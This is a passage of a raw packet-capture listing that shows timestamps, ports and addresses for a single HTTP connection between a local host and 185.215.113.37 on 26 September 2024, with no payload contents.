Sep 26, 2024 22:40:14.269787073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.269797087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.269800901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.269818068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.269835949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.269853115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.269860983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.269869089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.269869089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.269881010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.269901037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.269906998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.269917965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.269917965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.269932985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.269951105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.269958019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.269963980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.269963980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.269974947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.269994974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270040035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270040035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270073891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270088911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270103931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270122051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270143032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270165920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270344973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270361900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270375967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270394087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270395041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270411968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270430088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270437956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270437956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270447016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270462990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270467043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270482063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270498991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270524025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270570993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270590067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270606995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270627022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270642996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270661116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270665884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270677090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270689011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270694971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270710945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270713091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270730019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270730972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270746946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270762920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270770073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270787954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270792007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270804882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270809889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270824909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270838022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270840883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270857096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270869970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270874023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270888090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270890951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270905972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270912886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270921946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270937920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270937920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270957947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270970106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270973921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.270991087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.270991087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.271009922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.271034956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.271035910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.271079063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.271096945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.271112919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.271128893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.271147013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.271153927 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.271162033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.271173954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.271179914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.271223068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.271231890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.271239042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.271255016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.271284103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.271292925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.271292925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.271292925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.271301031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.271317959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.271322966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.271334887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.271341085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.271353006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.271359921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.271368980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.271379948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.271419048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.271440983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.359035969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359067917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359096050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359111071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359127998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359150887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359150887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.359168053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359225988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.359225988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.359509945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359525919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359539986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359555960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359622002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.359642982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359659910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359677076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359694004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359721899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359739065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359749079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.359756947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359774113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359792948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359807968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359831095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.359848976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.359878063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.397783995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.397804976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.397821903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.397839069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.397902966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.397917986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.397969961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.397984982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398000956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398001909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398027897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398031950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398046017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398061037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398066998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398086071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398118973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398144960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398161888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398178101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398194075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398204088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398210049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398230076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398260117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398262024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398277044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398298025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398304939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398313999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398329973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398334980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398344994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398355961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398385048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398411989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398411989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398427963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398436069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398442030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398448944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398458004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398475885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398487091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398497105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398504019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398535967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398570061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398638010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398655891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398672104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398688078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398705006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398709059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398719072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398720980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398739100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.398751974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398782015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.398814917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.399570942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.399586916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.399605036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.399627924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.399652004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.399655104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.399671078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.399719954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400254965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400280952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400298119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400310040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400338888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400350094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400420904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400437117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400453091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400470018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400477886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400487900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400583982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400599003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400624037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400645971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400660038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400660992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400682926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400691032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400691986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400707960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400722027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400722980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400738001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400741100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400754929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400758982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400777102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400778055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400793076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400804043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400809050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400832891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400835037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400855064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400868893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400876999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400891066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400891066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400902987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400903940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400921106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400935888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400935888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400958061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.400974035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.400989056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.401004076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.401019096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.401026011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.401035070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.401050091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.401051998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.401068926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.401073933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.401097059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.401103973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.401112080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.401124954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.401133060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.401169062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.401176929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.401207924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.401212931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.401235104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.401237965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.401254892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.401272058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.401287079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.401288033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.401304960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.401318073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.401321888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.401331902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.401367903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.527645111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527683020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527699947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527715921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527744055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527749062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.527764082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527784109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527800083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527813911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.527815104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527832031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527843952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.527847052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527864933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527864933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.527882099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527913094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527925968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.527930021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527945042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527961016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527961969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.527961969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.527976036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.527995110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.528002024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.528013945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.528028965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.528054953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.528122902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.528146982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.528165102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.528179884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.528182983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.528193951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.528209925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.528223038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.528230906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.528249025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.528265953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.528290033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.528305054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.528318882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 22:40:14.528320074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 22:40:14.528336048 CEST	80	49730	185.215.113.37	192.168.2.4
